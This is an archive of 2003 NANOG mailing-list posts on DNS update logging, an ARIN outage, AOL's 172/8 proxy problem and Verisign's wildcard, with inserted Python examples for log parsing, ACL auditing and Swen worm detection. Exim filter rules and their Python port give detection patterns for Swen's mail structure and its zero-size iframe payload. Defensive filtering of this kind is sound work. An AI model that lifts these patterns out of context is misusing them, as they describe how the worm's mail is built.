Back in beta days, the official explanation given was that the DNS updating was a "value add" and that it would never be disabled as a default as a courtesy to corporate customers. Furthermore, MSFT folks have repeatedly said that the workaround is to simply configure your nameserver to silently ignore the error logs.

Well, I'm not going to disable that logging since it has been useful in signalling real attacks in the past. But the thing Microsoft needed to do with this was ensure that whoever is pirating my domain names on their home PCs get error message popups telling them to go to MSN and buy a real domain name. That is, they could be making money here rather than just giving my syslogd a headache. If MSFT would behave more greedily then their customer PCs would be contacting them rather than me, right?

--
Paul Vixie
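Turning the "keep the logging, but refuse the offender" idea above into something repeatable means reading the update-denied lines out of named's log and generating the refusal. The following added example (not Paul's or Brian's code, and not part of BIND) does that: it counts refused dynamic updates per client and per zone from constructed syslog lines, and emits an options stanza whose negated allow-query entries make named answer those clients with REFUSED. The log format assumed is BIND 9's "client A.B.C.D#port: update 'zone/IN' denied" message; check it against your own named version before relying on the regex. The client addresses, the zone names and the threshold of three denials are assumptions.

```python
"""Summarise BIND 'update denied' log lines and emit a refusal stanza.

Added example. The log lines are constructed and follow the BIND 9 form
"client A.B.C.D#port: update 'zone/IN' denied" (an assumption about the
format; verify against your named). Client addresses are documentation
ranges, zone names are example domains.
"""
import re
from collections import Counter, defaultdict

DENIED = re.compile(
    r"client (?P<client>\d+\.\d+\.\d+\.\d+)#(?P<port>\d+): "
    r"update '(?P<zone>[^']+)/IN' denied"
)

# Constructed sample: one home PC hammering two zones, one stray client,
# and an unrelated named message that must be ignored.
SAMPLE_LOG = """\
Sep 28 12:09:01 ns1 named[1234]: client 203.0.113.45#1045: update 'example.com/IN' denied
Sep 28 12:09:03 ns1 named[1234]: client 203.0.113.45#1046: update 'example.com/IN' denied
Sep 28 12:09:07 ns1 named[1234]: client 203.0.113.45#1047: update 'example.com/IN' denied
Sep 28 12:10:11 ns1 named[1234]: client 198.51.100.9#3001: update 'example.com/IN' denied
Sep 28 12:11:30 ns1 named[1234]: client 203.0.113.45#1048: update 'example.net/IN' denied
Sep 28 12:12:00 ns1 named[1234]: zone example.com/IN: loaded serial 2003092801
"""


def parse_denial(line):
    """Return {'client','port','zone'} for an update-denied line, else None."""
    m = DENIED.search(line)
    return m.groupdict() if m else None


def summarize(log):
    """Count denials per client and record which zones each client hit."""
    per_client = Counter()
    zones = defaultdict(set)
    for line in log.splitlines():
        d = parse_denial(line)
        if d:
            per_client[d["client"]] += 1
            zones[d["client"]].add(d["zone"])
    return per_client, zones


def refuse_stanza(per_client, min_denials=3):
    """named.conf options block that answers persistent offenders with REFUSED.

    A negated entry in allow-query is the 'return errors' behaviour suggested
    above: queries from those addresses get RCODE REFUSED instead of an
    answer. The threshold (assumed) keeps a single stray update from cutting
    off whoever holds that dialup address next."""
    offenders = sorted(c for c, n in per_client.items() if n >= min_denials)
    if not offenders:
        return ""
    negated = "".join("!%s; " % c for c in offenders)
    return "options {\n  allow-query { %sany; };\n};\n" % negated


if __name__ == "__main__":
    counts, hit_zones = summarize(SAMPLE_LOG)
    for client, n in counts.most_common():
        print("%-16s %3d denials  zones: %s" % (client, n, ", ".join(sorted(hit_zones[client]))))
    print(refuse_stanza(counts))
```

If the aim is to drop the client's queries silently rather than answer REFUSED, the same address list goes into a blackhole { ... }; statement instead; either way, addresses handed out to dialup and cable customers change hands, so an entry generated from the log should be aged out rather than left in named.conf indefinitely.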
Re: what happened to ARIN tonight ?
works fine for me.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Mike Tancsa [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, September 28, 2003 9:29 PM
Subject: what happened to ARIN tonight ?

The Oregon route server seems to indicate they are off the air. Not that I care to look at fee schedules tonight, but the whois server for in-addr.arpa is toast as a result :-(

---Mike

BGP routing table entry for 192.149.252.0/24, version 1277910
Paths: (57 available, best #48, table Default-IP-Routing-Table)
Flag: 0x8A0
  Not advertised to any peer
  15290 7018 701 7046 (history entry)
    216.191.65.126 from 216.191.65.126 (216.191.65.126)
      Origin IGP, localpref 100, external
      Dampinfo: penalty 1407, flapped 2 times in 00:02:01
  6939 7911 701 7046 (history entry)
    216.218.252.152 from 216.218.252.152 (216.218.252.152)
      Origin IGP, localpref 100, external
      Dampinfo: penalty 1408, flapped 2 times in 00:01:42
  15290 7018 701 7046 (history entry)
    216.191.65.118 from 216.191.65.118 (216.191.65.118)
      Origin IGP, localpref 100, external
      Dampinfo: penalty 1407, flapped 2 times in 00:02:00
  6395 1239 701 7046 (history entry)
    216.140.2.59 from 216.140.2.59 (216.140.2.59)
      Origin IGP, metric 5657, localpref 100, external
      Community: 6395:1 6395:1007
      Dampinfo: penalty 2796, flapped 4 times in 00:01:46

Mike Tancsa, tel +1 519 651 3400
Sentex Communications, [EMAIL PROTECTED]
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
Re: AOL Proxy Servers not connecting via https
Last time I checked, SSL connections do not get proxied through the AOL caching servers. They go directly from the client. 172.151.135.3 is not an AOL proxy server, it is an end user IP address that an AOL user gets when they dial in. cache-rf03.proxy.aol.com is an AOL proxy.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: mike harrison [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, September 25, 2003 2:24 PM
Subject: AOL Proxy Servers not connecting via https

I'm looking for a clueful person either inside of AOL's NetOps or someone else that can help us.

Problem: Using AOL Dial-Up, through AOL Browser or MSIE users can connect to our web servers and our clients' web servers via normal http with no problem. If they connect to a secure site (https://) they get 'page can not be displayed' and other errors. We have this issue with Linux/Apache as well as MSIE servers.

Sniffing such connections, we get one of two scenarios:

1. A connection is opened from an AOL proxy server (172.151.135.3 for example) yet no data is transmitted.

2. A connection is opened from an AOL proxy server. What looks like a request is sent (580 bytes) and some response is sent back (5k bytes). Yet the client's browser never gets a website. The webserver logs an 'error 408' from the request, which is a request timeout.

2 test websites to try from AOL:
https://www.krystal.net MS
https://www.onrope1.com Linux/Apache

Clue Bats welcome. Thank You --Mike--
Re: AOL Proxy Servers not connecting via https - resolved
This might be helpful to people setting up ACLs and the like:

http://webmaster.info.aol.com/proxyinfo.html

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: mike harrison [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, September 25, 2003 5:10 PM
Subject: Re: AOL Proxy Servers not connecting via https - resolved

A Clue Bat was gently swung by a friendly and clueful (semi-anonymous) AOL NetOps guy who contacted me from my post on Nanog. Thanks Nanog, and this sounds strange from me, but Thanks, AOL. :)

And yes, it should have been obvious on my part.. a router was configured with a 172.0.0.0/8 netmask.

..there is what we call an "RFC1918 issue". AOL was given some IPs in the 172.16.x.x range by ARIN. These are valid routable IPs, and we use them as IPs for the AOL user's machines (kinda like DHCP). The problem is that some people block all of 172.x.x.x thinking it's only for non-routable IPs when it's only half that range that is non-routable. (172.16.0.0/20 is the routable part). That appears to be the case with this one. We've asked ARIN for a different range, and they told us to go away, so we are stuck with this issue. If you can ask someone who does firewall and/or router ACLs in front of that website, they should be able to fix the issue.
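The misconfiguration in the thread above is a common one: an ACL written as 172.0.0.0/8 on the assumption that all of 172.x.x.x is RFC 1918 space, when only 172.16.0.0/12 is. The following is an added example, not code from AOL or from the poster, that audits a list of "bogon" deny entries against the three RFC 1918 blocks, reports the public ranges an over-broad entry would drop, and checks whether a given client address (172.151.135.3, the AOL dialup address from the thread) is being cut off by mistake. The ACL entries are constructed; the function and variable names are this example's own.

```python
"""Audit a 'deny RFC 1918' ACL for the 172/8 mistake (added example).

Only 172.16.0.0/12 is RFC 1918 space; the rest of 172.0.0.0/8 is ordinary
routable space, so a deny entry written as 172.0.0.0/8 cuts off public
clients such as the AOL dialup address 172.151.135.3 named in the thread.
The sample ACL below is constructed.
"""
import ipaddress

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

SAMPLE_ACL = ["10.0.0.0/8", "172.0.0.0/8", "192.168.0.0/16"]  # constructed


def is_rfc1918(ip):
    """True only for addresses inside the three RFC 1918 blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def overblocked(acl_entry):
    """Public (non-RFC 1918) ranges that a deny entry wrongly covers.

    Returns the ranges sorted by address; empty when the entry lies wholly
    inside private space, i.e. when blocking it is what the author meant."""
    remaining = [ipaddress.ip_network(acl_entry, strict=False)]
    for priv in RFC1918:
        nxt = []
        for net in remaining:
            if priv.subnet_of(net):
                nxt.extend(net.address_exclude(priv))  # carve the private part out
            elif net.subnet_of(priv):
                pass                                   # wholly private: intended
            else:
                nxt.append(net)
        remaining = nxt
    return sorted(remaining)


def wrongly_blocked(acl, ip):
    """Return the deny entry that cuts off a public address, else None."""
    if is_rfc1918(ip):
        return None
    addr = ipaddress.ip_address(ip)
    for entry in acl:
        if addr in ipaddress.ip_network(entry, strict=False):
            return entry
    return None


def audit(acl):
    """Map every over-broad entry to the public ranges it would drop."""
    report = {}
    for entry in acl:
        extra = overblocked(entry)
        if extra:
            report[entry] = [str(n) for n in extra]
    return report


if __name__ == "__main__":
    print(audit(SAMPLE_ACL))
    print(wrongly_blocked(SAMPLE_ACL, "172.151.135.3"))
```

The corrected entry is simply 172.16.0.0/12 in place of 172.0.0.0/8; the audit shows that the /8 also drops 172.0.0.0/12, 172.32.0.0/11, 172.64.0.0/10 and 172.128.0.0/9, which together is most of the block.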
Re: When is Verisign's registry contract up for renewal
----- Original Message -----
From: Robert Blayzor [EMAIL PROTECTED]
To: Sean Donelan [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Saturday, September 20, 2003 5:01 PM
Subject: Re: When is Verisign's registry contract up for renewal

Quite honestly I'd like to see all of the GTLD servers given to neutral companies, ones that ARE not registrars. Verisign is already engaging in a lot of unfair business practices because they hold the GTLD servers for net/com. The wildcard SNAFU is just one of their tactics to patch the financial hole since people have been switching registrars in droves.

I've had long discussions with my admin team at the SOSDG on what would be the best way to prevent stuff like this from happening in the future. We came to the following conclusion:

* Root servers or any critical DNS servers should not be in the control of companies. It should be handed over to non-profit/not-for-profit orgs who will not be tempted to do the things Verisign has done. We feel completely comfortable with the root servers being in control of a group like the ISC or even govt. agencies like NASA.

There is too much at stake here for people to be playing games with TLDs, especially ones as important as .com and .net.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
Re: Nothing like viruses with bugs in them (Swen)
These are exim filters which catch the damn thing when the antivirus software misses it. Hopefully it might be useful. It was taken from http://pkierski.republika.pl/filtry.shtml.

    # Exim filter
    #
    # Swen.1: multipart/mixed with a quoted six-letter boundary and the
    # "September 2002/2003, Cumulative Patch" text in the body. Note that
    # $message_body only holds the first message_body_visible bytes of
    # the body (500 by default), so the text has to appear near the top.
    if $h_content-type: matches "multipart/mixed; boundary=.[a-z]{6}"
       and $message_body matches "September 200[23], Cumulative Patch"
    then
      logfile $home/filter.log 0644
      logwrite "$tod_log - filter: *** Swen.1 *** - sender: $sender_address - subject: $h_subject:"
      seen finish
    endif

    # Swen.2: multipart/alternative with the same boundary shape and a
    # quoted-printable zero-size iframe that pulls the payload in by cid:
    if $h_content-type: contains "multipart/alternative;"
       and $h_content-type: matches "boundary=.[a-z]{6}"
       and $message_body matches "iframe src=3D.cid:.*height=3D0.* width=3D0.*/iframe"
    then
      logfile $home/filter.log 0644
      logwrite "$tod_log - filter: *** Swen.2 *** - sender: $sender_address - subject: $h_subject:"
      seen finish
    endif

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Mark Radabaugh [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, September 19, 2003 12:03 PM
Subject: Nothing like viruses with bugs in them (Swen)

Seems like this virus/worm has a bug where it will occasionally send out 1 byte attachments rather than the correct worm payload. Since the virus is not truly attached it tends to pass through e-mail virus scanners. It's causing a fair amount of end user confusion today -- lots of 'why is your/my virus scanner not working?' questions.

Mark Radabaugh
Amplex
(419) 720-3635
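The two Exim rules above match on message structure and text rather than on the attachment, which is exactly why they still fire on the broken one-byte-attachment copies Mark describes. The following is an added example that ports the same two rules to Python with the email module and adds a third check for attachments of at most one byte; it is not the Exim filter author's code, not Exim's, and not from the post. The two messages it runs on are constructed (example.com addresses, made-up boundaries and text), and the "Swen.stub" label for the truncated-attachment case is this example's own.

```python
"""Swen detection on message structure and body text (added example).

Ports the two Exim rules above (Swen.1 and Swen.2) to Python and adds a
check for the one-byte attachment variant that anti-virus scanners miss.
Both sample messages are constructed; the 'Swen.stub' label is this
example's own name for the truncated-attachment case.
"""
import email
import re
from email import policy

MIXED_RE = re.compile(r"multipart/mixed; boundary=.[a-z]{6}")
BOUNDARY_RE = re.compile(r"boundary=.[a-z]{6}")
PATCH_RE = re.compile(r"September 200[23], Cumulative Patch")
IFRAME_RE = re.compile(r"iframe src=3D.cid:.*height=3D0.* width=3D0.*/iframe")

# Constructed: the fake 'patch' mail with a one-byte attachment.
SWEN_SAMPLE = """\
From: "Microsoft Corporation Security Center" <security@example.com>
To: victim@example.com
Subject: Latest Net Security Upgrade
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="qwerty"

--qwerty
Content-Type: text/plain; charset="us-ascii"

Microsoft Customer, this is the latest version of security update, the
September 2003, Cumulative Patch update which eliminates all known
security vulnerabilities affecting Internet Explorer and Outlook.

--qwerty
Content-Type: application/octet-stream; name="patch.exe"
Content-Disposition: attachment; filename="patch.exe"
Content-Transfer-Encoding: base64

AA==
--qwerty--
"""

# Constructed: an ordinary mail with a real attachment, to show no match.
BENIGN_SAMPLE = """\
From: alice@example.com
To: bob@example.com
Subject: notes from the meeting
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0010"

------=_NextPart_000_0010
Content-Type: text/plain; charset="us-ascii"

Here are the notes you asked for.

------=_NextPart_000_0010
Content-Type: text/plain; name="notes.txt"
Content-Disposition: attachment; filename="notes.txt"
Content-Transfer-Encoding: base64

aGVsbG8gd29ybGQ=
------=_NextPart_000_0010--
"""


def message_body(raw):
    """Approximate Exim's $message_body: the raw body after the header block
    with newlines turned into spaces. Exim also truncates it to
    message_body_visible bytes (500 by default); this port does not."""
    _, _, body = raw.partition("\n\n")
    return body.replace("\r", " ").replace("\n", " ")


def classify(raw):
    """Return {'rules': [matched rule names], 'tiny_attachments': [filenames]}."""
    msg = email.message_from_string(raw, policy=policy.default)
    ctype = str(msg.get("Content-Type", ""))
    body = message_body(raw)
    rules = []
    if MIXED_RE.search(ctype) and PATCH_RE.search(body):
        rules.append("Swen.1")
    if ("multipart/alternative;" in ctype and BOUNDARY_RE.search(ctype)
            and IFRAME_RE.search(body)):
        rules.append("Swen.2")
    # Attachments of at most one byte: the bug Mark describes. There is no
    # executable for a scanner to recognise, so the body text is all that
    # is left to match on.
    tiny = [part.get_filename() for part in msg.iter_attachments()
            if len(part.get_payload(decode=True) or b"") <= 1]
    if tiny and PATCH_RE.search(body):
        rules.append("Swen.stub")
    return {"rules": rules, "tiny_attachments": tiny}


if __name__ == "__main__":
    print(classify(SWEN_SAMPLE))
    print(classify(BENIGN_SAMPLE))
```

Matching on the raw, still quoted-printable body (the =3D in the iframe rule) is deliberate and mirrors the Exim filter; if you decode parts before matching, the pattern has to change to plain "=" as well.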
Re: Worst design decisions?
*glares*

Sometimes, especially on the Windows platform, it's hard trying to find an email program which does what you need it to. I've tried Eudora, Netscape/Mozilla, and a few others I forget what they are named. All feel clumsy and incomplete. Outlook and its little friend Outlook Express at least work pretty consistently. I've not had serious problems using it full time.

Now, before everyone starts calling me a Microsoft supporter - I hate Microsoft just as much as any other sysadmin/netadmin. But sometimes (albeit rarely), Microsoft does something halfway decent.

Now, if I could get K-Mail for Windows, I'd be in good shape.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: David Lesher [EMAIL PROTECTED]
To: nanog list [EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 10:01 AM
Subject: Re: Worst design decisions?

Sorry, I missed the hands-down winner in my initial thinking, since it's not in my arena [hardware]..

The envelope please..

Micro$loth Lookout {applause}

Starting with "Let's invent top-posting" and moving to its virus-spreading abilities; Lookout has never met a standard, either hard [written/RFC] or not [consensus] that it could not wound/kill. Further, it damages the thinking of its users almost as well as drug dealers' wares -- be that crack or this week's over-hyped anti-depress^H^H^H mood-fixer. It's the Newspeak of the current era.

--
A host is a host from coast to ... [EMAIL PROTECTED]
no one will talk to a host that's close ... [v].(301) 56-LINUX
Unless the host (that isn't close) ... pob 1433
is busy, hung or dead ... 20915-1433
Re: Worst design decisions?
----- Original Message -----
From: E.B. Dreger [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 1:04 PM
Subject: Re: Worst design decisions?

You have reminded me of Bay's config GUI. I shall have nightmares tonight.

Ah, the days when I used to work on Bay routers. I've trashed routers with the GUI. Ran like a dog on even the fastest machines. The CLI config isn't much better either. The best thing though was finding that some of the Bay routers (the ARN mostly) had their CLI config ripped out to save space on the flash card. Half the time I was on site with a customer when I discovered this. I always carried a Mac laptop, so I was royally screwed.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
Re: Route failures to behosting.com
Hello,

Attempts to access behosting.com were successful from several different locations, which included Ameritech and Sprint. I'm not going to include traceroutes here (if you would like them, I can email them to you privately). What ISPs are you using to try and get to them?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Lou Katz [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, September 17, 2003 9:23 PM
Subject: Route failures to behosting.com

I am unable to reach them via several different ISPs. It looks to my naive eyes like routes to them have vanished. Can anyone shed any light on this?

--
-=[L]=-